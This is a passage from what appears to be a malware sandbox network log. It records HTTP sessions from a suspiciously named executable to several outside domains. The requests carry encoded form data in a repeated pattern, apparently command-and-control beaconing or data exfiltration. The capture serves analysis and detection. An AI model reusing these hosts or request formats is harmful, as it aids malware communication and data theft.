                  Host: www.zl1l5r.website
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.zl1l5r.website
                  Content-Length: 223
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.zl1l5r.website/450c/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 79 59 41 61 36 36 71 6e 4b 4e 5a 62 58 39 53 76 67 6e 32 47 6c 44 6d 39 4e 6f 38 51 6c 69 77 6f 4a 58 49 71 49 32 39 33 38 36 73 33 76 70 7a 30 44 51 4a 77 77 59 73 6d 50 73 47 57 62 36 45 4f 61 48 49 38 39 78 65 52 39 43 4e 52 4b 45 70 6d 6d 71 79 79 70 59 72 51 4d 79 43 46 50 37 4f 35 4b 7a 75 58 6a 70 59 2f 68 6c 54 4e 34 46 6e 7a 37 74 52 68 41 4d 74 55 79 70 72 62 71 43 55 44 61 45 33 55 6e 30 7a 75 43 56 36 55 64 6a 4d 6c 41 6e 34 78 71 71 58 48 35 32 52 41 75 41 51 33 6f 76 61 68 56 38 57 6d 75 4e 48 76 74 30 44 76 67 78 51 75 4f 41 76 6c 41 73 6a 51 4d 65 4e 43 52 58 4f 6a 66 58 43 38 66 32 45 41 79 35 39 57 43 37 74 75 4b 4e 49 3d
                  Data Ascii: ylT8el=yYAa66qnKNZbX9Svgn2GlDm9No8QliwoJXIqI29386s3vpz0DQJwwYsmPsGWb6EOaHI89xeR9CNRKEpmmqyypYrQMyCFP7O5KzuXjpY/hlTN4Fnz7tRhAMtUyprbqCUDaE3Un0zuCV6UdjMlAn4xqqXH52RAuAQ3ovahV8WmuNHvt0DvgxQuOAvlAsjQMeNCRXOjfXC8f2EAy59WC7tuKNI=
                  Jul 3, 2024 10:52:07.586397886 CEST190INHTTP/1.1 400 Bad Request
                  Server: nginx
                  Date: Wed, 03 Jul 2024 08:52:07 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: d404 Not Found0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  11192.168.2.1149730198.16.50.172801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:52:09.495687962 CEST1711OUTPOST /450c/ HTTP/1.1
                  Host: www.zl1l5r.website
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.zl1l5r.website
                  Content-Length: 1235
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.zl1l5r.website/450c/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 79 59 41 61 36 36 71 6e 4b 4e 5a 62 58 39 53 76 67 6e 32 47 6c 44 6d 39 4e 6f 38 51 6c 69 77 6f 4a 58 49 71 49 32 39 33 38 37 34 33 73 61 37 30 4d 54 52 77 78 59 73 6d 52 38 47 4c 62 36 46 63 61 48 51 34 39 78 69 76 39 41 31 52 4d 53 39 6d 75 37 79 79 6d 59 72 51 54 43 43 59 43 62 50 37 4b 7a 2b 49 6a 74 30 2f 68 6c 54 4e 34 44 44 7a 76 76 31 68 43 4d 74 58 6b 5a 72 58 75 43 55 37 61 46 66 45 6e 30 33 59 43 6b 47 55 64 44 63 6c 46 56 67 78 72 4b 58 46 34 47 51 64 75 41 63 38 6f 73 2b 54 56 34 65 66 75 50 58 76 73 53 66 77 35 67 59 6c 51 43 66 59 65 4e 7a 54 52 39 68 55 51 51 57 67 4f 6b 61 52 66 77 49 65 36 61 63 73 58 35 70 30 56 70 4a 6f 71 62 6a 49 51 30 59 6f 4a 47 48 65 35 71 63 30 55 64 6d 52 79 2b 72 35 4c 53 34 4e 39 30 46 52 34 67 47 6a 69 38 2b 74 72 35 36 63 42 31 31 4c 50 46 6c 39 77 32 79 66 41 4b 49 33 72 50 67 70 65 71 39 53 31 67 65 51 6f 70 4f 44 65 68 47 73 37 37 45 71 77 69 4a 46 45 2b 77 74 43 7a 65 38 39 62 52 42 72 51 36 74 74 71 73 4f 4f 77 59 48 75 37 4a [TRUNCATED]
                  Data Ascii: ylT8el=yYAa66qnKNZbX9Svgn2GlDm9No8QliwoJXIqI2938743sa70MTRwxYsmR8GLb6FcaHQ49xiv9A1RMS9mu7yymYrQTCCYCbP7Kz+Ijt0/hlTN4DDzvv1hCMtXkZrXuCU7aFfEn03YCkGUdDclFVgxrKXF4GQduAc8os+TV4efuPXvsSfw5gYlQCfYeNzTR9hUQQWgOkaRfwIe6acsX5p0VpJoqbjIQ0YoJGHe5qc0UdmRy+r5LS4N90FR4gGji8+tr56cB11LPFl9w2yfAKI3rPgpeq9S1geQopODehGs77EqwiJFE+wtCze89bRBrQ6ttqsOOwYHu7JAUJYEuLafST4IxyfHpMqA8lOE7niSFztb4UR5eGCr+tYkum8fbDDAiqXANmfs3TfnFrorOanP79Ilyb4EJkCXc4EooIDAof3GSymEv93DfYYJXnqLfyK7bkGnbnVhq9SOR++esxHozeZ+8+dZBqtaTuOcICzEp/kp7woxN3lCCvLpAGyFWP++4RVguh7TUNPayWv0oWG2zpcGpXOHkII7Fj065PFp0ofNaDF9mG9L6Yk5fu+YVUNt+Mlz/zxtExJKbgEeMpvEzuJytwTA1xzdTVZuQs+/vIFihnwRbhL3mAB4sDEFHVedxioRN0zs16EkNXChS+dm5o1I9QnMx854em92pWq994HkzzPP+UpMMlHaAq0i9Q8I8xtTGIrstY86fA+n0h5FxhG+tXRs8IweiYu+zEfsTToQ8Pi5LfdPEU5vBrXLFlkeBsvRarxJwlO3KD+n2yDkCMXKsdz7uuJgw8wLtgU34+EgBSxawI8o4oNylMyAoo35++8CjUj+6vxKapwY5PYW1H52Zi6/VNCvx88h6SdmJgTGoHe1BjOSTHTsV4A/ihwLTABxvgrGJtsusaj7C45Kb1NtEmsLyIlpBIFbBq203NhAKclcSxYc2E/jugUVvJl8FdrJNq7R4MYICuv25LMDX2UakDC0cc6OzBvxqKTyczx2O [TRUNCATED]
                  Jul 3, 2024 10:52:10.833755016 CEST190INHTTP/1.1 400 Bad Request
                  Server: nginx
                  Date: Wed, 03 Jul 2024 08:52:10 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: d404 Not Found0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  12192.168.2.1149731198.16.50.172801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:52:12.038404942 CEST413OUTGET /450c/?Qb94=7vWTifjxU&ylT8el=/ao65P+sOfMmbfuniX6EnBn+VadGjlZ4IHs7OXNxrL4MnIz0MXJ+3t4uCaWRdYsePUgUyRGsjSJtYkpLrLyO4a/zR2SZCsSjaR7P/IMYlkzk2RPJsuViTJY= HTTP/1.1
                  Host: www.zl1l5r.website
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.9
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Jul 3, 2024 10:52:12.781395912 CEST1236INHTTP/1.1 200 OK
                  Server: nginx
                  Date: Wed, 03 Jul 2024 08:52:12 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Vary: Accept-Encoding
                  Data Raw: 37 31 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 3a 6c 61 6e 67 3d 22 7a 68 2d 43 4e 22 20 6c 61 6e 67 3d 22 7a 68 2d 43 4e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0a 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 3e 0a 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0a 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 63 65 2d 72 65 6e 64 65 [TRUNCATED]
                  Data Ascii: 7119<!DOCTYPE html><html xml:lang="zh-CN" lang="zh-CN"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, viewport-fit=cover"> <meta name="renderer" content="webkit"> <meta name="force-rendering" content="webkit"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>-</title> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta property="og:type" content="index"> <meta property="og:title" content=" [TRUNCATED]
                  Jul 3, 2024 10:52:12.781436920 CEST1236INData Raw: 9a e8 88 9b 2d 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 2f 73 74 61 74 69 63 2f 75 70 6c 6f 61 64 73 2f 32 30 32 34 31 32 2f 2f 36 37 66 30 38 32 62 37 36 34 35 36 30
                  Data Ascii: -"> <meta property="og:image" content="/static/uploads/202412//67f082b7645600972e9dd0c8882ac0a4.png"> <meta property="og:url" content="http://www.zl1l5r.website/450c/"> <script src="http://www.zl1l5r.website/template/zblogres/khuboni
                  Jul 3, 2024 10:52:12.781450987 CEST1236INData Raw: 22 66 61 76 2d 73 75 62 6e 61 76 20 6b 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 2d 62 61 72 2d 6c 65 66 74 20 70 75 6c 6c 2d 6c 65 66 74 20 6e 61 76 6c 6f 67 6f 20 7a 68 66 22 3e 0a 20 20 20 20 20 20 20 20
                  Data Ascii: "fav-subnav ks"> <div class="top-bar-left pull-left navlogo zhf"> <div class="m-top-search ef"><i class="icon font-search top-search gdnz"></i> </div> <a href="/" class="logo box n"><img
                  Jul 3, 2024 10:52:12.781872988 CEST1236INData Raw: 2f 2f 77 77 77 2e 7a 6c 31 6c 35 72 2e 77 65 62 73 69 74 65 2f 62 61 69 6b 65 2f 22 20 74 69 74 6c 65 3d 22 e7 99 be e7 a7 91 22 3e e7 99 be e7 a7 91 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                  Data Ascii: //www.zl1l5r.website/baike/" title=""></a></li> <li class="navbar-item q"><a href="http://www.zl1l5r.website/yule/" title=""></a></li> <li class="navbar-item low
                  Jul 3, 2024 10:52:12.781886101 CEST1236INData Raw: 73 72 20 6d 61 69 6e 20 66 6c 20 70 6f 70 6a 74 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 7a 6a 68 20 73 69 6e 67 6c 65 20 62 6f 78 2d 73 68 6f 77 20 74 69 6b 22 3e 0a 09 3c 61 72 74 69 63 6c 65 20 63 6c 61 73 73 3d 22 6f 67 20
                  Data Ascii: sr main fl popjt"><div class="czjh single box-show tik"><article class="og single-post wurb"><header class="qjbmt single-title wy"><nav class="v single-place place rwg"><i class="vs icon font-home q"></i><a href="/">
                  Jul 3, 2024 10:52:12.781896114 CEST1236INData Raw: 22 3e 3c 2f 69 3e 51 54 4d 4a 5a 42 4d 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 63 20 73 69 6e 67 6c 65 2d 74 69 6d 65 20 62 70 6a 62 6d 22 20 74 69 74 6c 65 3d 22 32 30 32 34 2d 30 37 2d 30 33 20
                  Data Ascii: "></i>QTMJZBM</a></span><span class="ec single-time bpjbm" title="2024-07-03 16:52:12"><span class="sqrjx spot toh"></span><i class="g icon font-time tn"></i>2024-07-03 16:52:12</span><span class="hv single-views qypa"><span class="v
                  Jul 3, 2024 10:52:12.781908035 CEST1236INData Raw: 8e 92 e5 90 8d e7 ac ac 35 e4 bd 8d ef bc 8c e5 b7 b2 e7 bb 8f e7 a1 ae e5 ae 9a e6 97 a0 e7 bc 98 e4 b8 8b e8 b5 9b e5 ad a3 e7 9a 84 e6 ac a7 e5 86 a0 ef bc 8c e8 bf 99 e6 84 8f e5 91 b3 e7 9d 80 e7 90 83 e9 98 9f e4 b8 8b e8 b5 9b e5 ad a3 e7
                  Data Ascii: 5</p><p>
                  Jul 3, 2024 10:52:12.782574892 CEST1236INData Raw: e4 b8 ba e3 80 8a e7 9f a5 e8 af 86 e3 80 8b e7 9a 84 e6 89 80 e6 9c 89 e6 96 87 e7 ab a0 22 3e e7 9f a5 e8 af 86 3c 2f 61 3e 3c 2f 64 69 76 3e 09 09 3c 2f 66 6f 6f 74 65 72 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 61 20 73 74 61
                  Data Ascii: "></a></div></footer><div class="fa statement yc xlvpv"><span class="wqxq red t"></span>
                  Jul 3, 2024 10:52:12.782594919 CEST1236INData Raw: 3e 3c 2f 6c 69 3e 0a 09 09 09 09 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 7a 6c 31 6c 35 72 2e 77 65 62 73 69 74 65 2f 70 6f 73 74 2f 31 5f 35 34 2e 68 74 6d 6c 22 20 74 69 74 6c 65 3d 22 e8 be bd e7 b2 a4 e5 a4 a7
                  Data Ascii: ></li><li><a href="http://www.zl1l5r.website/post/1_54.html" title=""></a></li><li><a href="http://www.zl1l5r.website/post/1_52.html" tit
                  Jul 3, 2024 10:52:12.782608032 CEST1236INData Raw: e5 8d 8a e5 86 b3 e8 b5 9b 47 33 ef bc 9a e6 a3 ae e6 9e 97 e7 8b bc e4 b8 bb e5 9c ba e8 bf 8e e6 88 98 e6 8e 98 e9 87 91 ef bc 8c e6 8e 98 e9 87 91 e5 b1 95 e7 8e b0 e5 86 a0 e5 86 9b e9 9f a7 e6 80 a7 22 3e 4e 42 41 e8 a5 bf e9 83 a8 e5 8d 8a
                  Data Ascii: G3">NBAG3</a></li><li><a href="http://www.zl1l5r.website/post/1_68.html" title="
                  Jul 3, 2024 10:52:12.788069010 CEST1236INData Raw: 65 77 5f 69 6e 6e 65 72 20 77 73 65 22 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6b 79 71 7a 20 73 69 64 65 2d 6e 65 77 2d 74 69 74 6c 65 20 66 64 7a 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 7a 6c 31
                  Data Ascii: ew_inner wse"><div class="kyqz side-new-title fdz"><a href="http://www.zl1l5r.website/post/1_46.html" title="">


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  13192.168.2.11497323.33.130.190801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:52:26.024961948 CEST690OUTPOST /f0bn/ HTTP/1.1
                  Host: www.marismotivates.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.marismotivates.com
                  Content-Length: 203
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.marismotivates.com/f0bn/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 78 69 37 4b 6b 2f 4f 2b 63 4e 5a 49 57 77 62 32 66 70 49 54 59 67 37 62 62 6c 7a 6a 65 36 67 63 49 52 4d 50 58 57 34 48 7a 45 53 34 6d 52 4f 6e 48 44 6c 77 7a 38 39 58 70 63 34 6b 70 2b 42 45 68 38 30 4f 66 62 34 45 2f 6d 79 39 51 6e 4c 6d 69 5a 57 76 6e 57 35 67 63 59 43 61 44 58 6e 64 47 35 70 2f 42 54 67 38 4d 54 49 4f 6b 72 6d 65 65 5a 6a 62 71 64 4a 73 4b 33 55 37 42 72 6e 30 74 53 78 66 56 45 4a 33 37 46 6b 52 7a 4f 6c 62 35 2b 45 77 39 4b 62 46 71 72 52 63 4e 73 4a 53 50 66 67 2f 6c 57 4b 73 51 48 2b 39 5a 41 4e 76 59 39 7a 51 6b 33 58 62 79 4a 44 47 4a 54 63 63 74 77 3d 3d
                  Data Ascii: ylT8el=xi7Kk/O+cNZIWwb2fpITYg7bblzje6gcIRMPXW4HzES4mROnHDlwz89Xpc4kp+BEh80Ofb4E/my9QnLmiZWvnW5gcYCaDXndG5p/BTg8MTIOkrmeeZjbqdJsK3U7Brn0tSxfVEJ37FkRzOlb5+Ew9KbFqrRcNsJSPfg/lWKsQH+9ZANvY9zQk3XbyJDGJTcctw==


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  14192.168.2.11497333.33.130.190801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:52:28.571625948 CEST710OUTPOST /f0bn/ HTTP/1.1
                  Host: www.marismotivates.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.marismotivates.com
                  Content-Length: 223
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.marismotivates.com/f0bn/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 78 69 37 4b 6b 2f 4f 2b 63 4e 5a 49 57 51 72 32 63 49 49 54 65 41 37 63 57 31 7a 6a 4d 36 67 51 49 52 41 50 58 58 38 58 7a 32 32 34 6d 30 71 6e 45 47 5a 77 30 38 39 58 6d 38 35 73 6e 65 42 78 68 38 35 7a 66 61 45 45 2f 6d 6d 39 51 6c 44 6d 69 4b 4f 75 6f 6d 34 47 46 49 43 59 4a 33 6e 64 47 35 70 2f 42 53 51 53 4d 54 51 4f 6b 34 2b 65 4d 4b 37 59 31 74 4a 6a 64 48 55 37 4c 4c 6e 6f 74 53 77 36 56 47 38 71 37 48 63 52 7a 4c 42 62 2b 76 45 76 33 4b 62 44 6b 4c 51 7a 44 73 59 6f 42 73 35 48 6f 6e 79 41 57 32 47 78 52 6d 63 31 49 65 36 48 6e 6b 66 5a 6d 76 69 32 41 69 35 56 32 34 47 49 77 6c 35 39 57 53 36 61 4c 48 55 69 64 39 2b 68 4c 42 49 3d
                  Data Ascii: ylT8el=xi7Kk/O+cNZIWQr2cIITeA7cW1zjM6gQIRAPXX8Xz224m0qnEGZw089Xm85sneBxh85zfaEE/mm9QlDmiKOuom4GFICYJ3ndG5p/BSQSMTQOk4+eMK7Y1tJjdHU7LLnotSw6VG8q7HcRzLBb+vEv3KbDkLQzDsYoBs5HonyAW2GxRmc1Ie6HnkfZmvi2Ai5V24GIwl59WS6aLHUid9+hLBI=


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  15192.168.2.11497343.33.130.190801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:52:31.108525991 CEST1723OUTPOST /f0bn/ HTTP/1.1
                  Host: www.marismotivates.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.marismotivates.com
                  Content-Length: 1235
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.marismotivates.com/f0bn/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 78 69 37 4b 6b 2f 4f 2b 63 4e 5a 49 57 51 72 32 63 49 49 54 65 41 37 63 57 31 7a 6a 4d 36 67 51 49 52 41 50 58 58 38 58 7a 32 2b 34 6d 43 32 6e 47 6c 78 77 31 38 39 58 76 63 35 74 6e 65 42 57 68 38 52 33 66 61 49 79 2f 67 71 39 66 6e 37 6d 32 72 4f 75 7a 57 34 47 59 59 43 62 44 58 6e 49 47 35 35 37 42 54 73 53 4d 54 51 4f 6b 35 4f 65 50 5a 6a 59 33 74 4a 73 4b 33 55 4e 42 72 6e 4d 74 57 6b 41 56 47 35 64 37 30 55 52 7a 72 52 62 38 64 73 76 30 71 62 42 6c 37 51 72 44 73 55 4e 42 73 30 2b 6f 6e 32 71 57 32 2b 78 56 54 38 76 4e 76 50 63 78 56 50 6d 36 76 6d 4f 4c 67 64 59 70 75 6d 39 77 46 30 4e 42 43 32 4e 44 53 78 55 59 76 43 56 51 58 71 48 48 41 70 46 56 5a 6b 57 4a 2f 73 77 63 2f 72 71 59 6c 70 50 66 61 63 37 6d 56 42 64 6b 6b 36 44 6e 71 57 4b 45 58 56 37 6d 35 53 38 46 38 77 6f 44 49 57 56 31 43 69 59 6d 38 39 30 50 49 4e 73 36 70 49 74 33 32 76 47 35 32 75 42 71 5a 30 50 70 62 37 33 66 42 68 6c 57 30 37 74 45 57 36 63 37 4d 69 38 67 4d 57 66 74 59 78 66 63 46 48 73 32 44 4c [TRUNCATED]
                  Data Ascii: ylT8el=xi7Kk/O+cNZIWQr2cIITeA7cW1zjM6gQIRAPXX8Xz2+4mC2nGlxw189Xvc5tneBWh8R3faIy/gq9fn7m2rOuzW4GYYCbDXnIG557BTsSMTQOk5OePZjY3tJsK3UNBrnMtWkAVG5d70URzrRb8dsv0qbBl7QrDsUNBs0+on2qW2+xVT8vNvPcxVPm6vmOLgdYpum9wF0NBC2NDSxUYvCVQXqHHApFVZkWJ/swc/rqYlpPfac7mVBdkk6DnqWKEXV7m5S8F8woDIWV1CiYm890PINs6pIt32vG52uBqZ0Ppb73fBhlW07tEW6c7Mi8gMWftYxfcFHs2DLQFcw5c0RbpJdSONfIEoPu70qUngERk6l0WQrIhC5eAF8lPXmMpSnO/w7RcemKCCobMd05e8AtwkqYq+CL2zYRd2HK37DKhL0J3qtJDzD5BQiUXGARqzk42hOS5roXrP4nIEmVc5ZOj9dvrwYoWe8aw6jJPjbaklk5o+ZbiUdn9BIa2guPYmaMNRkSF6qXErmgPq4Wc8FDZ9GbBR15uR4jym8ND/BytZW6vXk1jdQmwblI8cws2N26N5XD1/h6I+1nR9Rxp2c/hHBYu9qhVJPtb5EoGTvjYjnmyf3AOWE/4OB5C7InYG/fetL4bw1vpKRxtBG+zbwWXO0XLe5nYHEDRjRbVKuDpa2f50tB0lwjIS1ThLOvLxqSsu/vnaP1Mp2WWOkJA55mSNmPKiZ+eEyuBUnByOh1HyDgDUB+uLlzskut/WU78+Ao9XKG2sBeGynAR/l5ZR6IDd3FciMfDRuvSyirq0EfUStsv34WPxFaG8Fp6tzzkCCZZ5WgOrq0qXkLte4VAUBpKaS1Y0KtglUUlGVVse582OU6y3gyzoqVUSTeaPWj54jRQZSnM3YorJ8hwxZ322MmSx6iEdghbiK4Xnw7E8KI4yj4DNwK+qCRse4iAAmtyKfdfYaA1MFiv/aRxxr7ki2Lh2Zu4Qqg2rtOQm91NJ20UmRpK [TRUNCATED]


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  16192.168.2.11497353.33.130.190801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:52:33.652359962 CEST417OUTGET /f0bn/?Qb94=7vWTifjxU&ylT8el=8gTqnLvKWah2bzreY4Z7YC6tcQCJVJlJXhg7Umglyi2zgynbPTp6zLopmb5gqsRo3dR1TaY9uWyFfEDO77D4zzlWEvz5BTf+ZLZnZGAxAhIiwZDsfI/I78A= HTTP/1.1
                  Host: www.marismotivates.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.9
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Jul 3, 2024 10:52:34.128894091 CEST397INHTTP/1.1 200 OK
                  Server: openresty
                  Date: Wed, 03 Jul 2024 08:52:34 GMT
                  Content-Type: text/html
                  Content-Length: 257
                  Connection: close
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 62 39 34 3d 37 76 57 54 69 66 6a 78 55 26 79 6c 54 38 65 6c 3d 38 67 54 71 6e 4c 76 4b 57 61 68 32 62 7a 72 65 59 34 5a 37 59 43 36 74 63 51 43 4a 56 4a 6c 4a 58 68 67 37 55 6d 67 6c 79 69 32 7a 67 79 6e 62 50 54 70 36 7a 4c 6f 70 6d 62 35 67 71 73 52 6f 33 64 52 31 54 61 59 39 75 57 79 46 66 45 44 4f 37 37 44 34 7a 7a 6c 57 45 76 7a 35 42 54 66 2b 5a 4c 5a 6e 5a 47 41 78 41 68 49 69 77 5a 44 73 66 49 2f 49 37 38 41 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Qb94=7vWTifjxU&ylT8el=8gTqnLvKWah2bzreY4Z7YC6tcQCJVJlJXhg7Umglyi2zgynbPTp6zLopmb5gqsRo3dR1TaY9uWyFfEDO77D4zzlWEvz5BTf+ZLZnZGAxAhIiwZDsfI/I78A="}</script></head></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  17192.168.2.1149736217.116.0.191801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:52:48.365706921 CEST672OUTPOST /i4bw/ HTTP/1.1
                  Host: www.lecoinsa.net
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.lecoinsa.net
                  Content-Length: 203
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.lecoinsa.net/i4bw/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
